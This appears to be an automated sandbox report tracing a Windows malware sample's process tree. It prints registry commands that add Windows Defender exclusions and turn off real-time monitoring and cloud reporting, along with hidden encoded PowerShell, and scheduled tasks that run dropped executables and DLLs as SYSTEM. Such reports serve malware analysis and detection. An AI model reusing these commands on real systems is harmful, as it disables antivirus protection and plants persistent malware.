- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1360
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1672
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1548
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1092
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCtpnLIVK" /SC once /ST 03:48:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1640 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCtpnLIVK"4⤵PID:2000
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCtpnLIVK"4⤵PID:1256
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvffOywEAsomCrOclN" /SC once /ST 06:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\tMXQfmz.exe\" Bp /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1168
-
C:\Windows\system32\taskeng.exetaskeng.exe {54208390-9D89-4B2E-8BFE-DDC79A4D9D13} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1868
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1172
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1880
-
C:\Windows\system32\taskeng.exetaskeng.exe {995C3FAF-C290-4C88-81A6-AE6AC813F708} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1568
-
C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\tMXQfmz.exeC:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\tMXQfmz.exe Bp /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1604 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guGCWmPQx" /SC once /ST 04:06:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:856 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guGCWmPQx"3⤵PID:1636
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guGCWmPQx"3⤵PID:1300
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1880
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1984 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1336
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDtDWHpLt" /SC once /ST 02:58:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDtDWHpLt"3⤵PID:1932
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDtDWHpLt"3⤵PID:832
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:323⤵PID:276
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1856 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:643⤵PID:1456
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2032 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:323⤵PID:108
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:324⤵PID:1824
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:643⤵PID:2012
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:644⤵PID:1880
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\jWXQtFKEfMKfhKUF\IoGtrkBd\XdNspVLCSfkVyqnA.wsf"3⤵PID:1892
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\jWXQtFKEfMKfhKUF\IoGtrkBd\XdNspVLCSfkVyqnA.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1644 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:560 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1360 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\InaIvrjBgGxU2" /t REG_DWORD /d 0 /reg:324⤵PID:1960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\InaIvrjBgGxU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:856 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNrcflyMMmUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:320 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNrcflyMMmUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1884 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1196 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1820 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zjyBtxSiMuSUC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:524 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zjyBtxSiMuSUC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1544 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uOKUZcIdbhBstHVB" /t REG_DWORD /d 0 /reg:324⤵PID:1576
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uOKUZcIdbhBstHVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:360 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF" /t REG_DWORD /d 0 /reg:324⤵PID:1456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF" /t REG_DWORD /d 0 /reg:644⤵PID:616
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1952 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:996 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:324⤵PID:1168
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\InaIvrjBgGxU2" /t REG_DWORD /d 0 /reg:324⤵PID:1872
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:644⤵PID:596
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\InaIvrjBgGxU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1960 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNrcflyMMmUn" /t REG_DWORD /d 0 /reg:324⤵PID:1412
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNrcflyMMmUn" /t REG_DWORD /d 0 /reg:644⤵PID:1732
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:324⤵PID:1584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:644⤵PID:2028
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zjyBtxSiMuSUC" /t REG_DWORD /d 0 /reg:324⤵PID:832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zjyBtxSiMuSUC" /t REG_DWORD /d 0 /reg:644⤵PID:276
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uOKUZcIdbhBstHVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1576 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uOKUZcIdbhBstHVB" /t REG_DWORD /d 0 /reg:644⤵PID:1592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF" /t REG_DWORD /d 0 /reg:324⤵PID:1976
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1456 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:324⤵PID:584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jWXQtFKEfMKfhKUF" /t REG_DWORD /d 0 /reg:644⤵PID:1148
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZMlpeREG" /SC once /ST 03:23:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1324 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZMlpeREG"3⤵PID:1468
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZMlpeREG"3⤵PID:2028
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1608
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:832
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:680
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1408
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aClwDgKsxBQnbYjuF" /SC once /ST 04:18:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UkHfwTp.exe\" dn /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:276 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aClwDgKsxBQnbYjuF"3⤵PID:1576
-
C:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UkHfwTp.exeC:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UkHfwTp.exe dn /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:108 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvffOywEAsomCrOclN"3⤵PID:1948
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1092
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:616
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1400
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1168
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\pGMaoMOmU\VoTnpq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yKRLlrVxZRCwfvY" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1148 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yKRLlrVxZRCwfvY2" /F /xml "C:\Program Files (x86)\pGMaoMOmU\tIIFAmn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1656 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yKRLlrVxZRCwfvY"3⤵PID:1452
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yKRLlrVxZRCwfvY"3⤵PID:1624
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xMldJvduBHIruY" /F /xml "C:\Program Files (x86)\InaIvrjBgGxU2\QUrAUiT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:856 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AoZZmzTUnslpJ2" /F /xml "C:\ProgramData\uOKUZcIdbhBstHVB\rEbSlCu.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2000 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WzbfXanLtYYyBKpOR2" /F /xml "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\RjQzLHd.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1888 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LdHJZpmEfCRWAMVLKFS2" /F /xml "C:\Program Files (x86)\zjyBtxSiMuSUC\otBKIpL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1000 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GqChQHaYBumcgGPDT" /SC once /ST 05:04:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jWXQtFKEfMKfhKUF\BaFrjouE\ebGkfNA.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1640 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GqChQHaYBumcgGPDT"3⤵PID:1936
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1644
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:616
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1296
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1636
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aClwDgKsxBQnbYjuF"3⤵PID:1704
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jWXQtFKEfMKfhKUF\BaFrjouE\ebGkfNA.dll",#1 /site_id 5254032⤵PID:1332
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jWXQtFKEfMKfhKUF\BaFrjouE\ebGkfNA.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:584 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GqChQHaYBumcgGPDT"4⤵PID:1412
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1628
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:320
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1626753248-1345378077858557482-1823261634-55452476521246575671536643257-1516174167"1⤵
- Windows security bypass
PID:616
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1220
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59af0abecdd555113f162b086a7d68638
SHA137107739e708f5d454b76b6b41ea292fe89c268c
SHA25654dbd032a50620c017121aceedf403f0ba3c109f7308a1a147744dff6f46e80c
SHA512cce12af1a213e9560bca199d84f008d9e8d7fc07b4df0c4ee4b376950c5a153dbf8e15e4a1b05f21cba5c7344b5da0dc6d2ebff0aaba729353ebe37b4f2a69b3
-
Filesize
2KB
MD5042b2ad9f54da8b56c221afeb50612b1
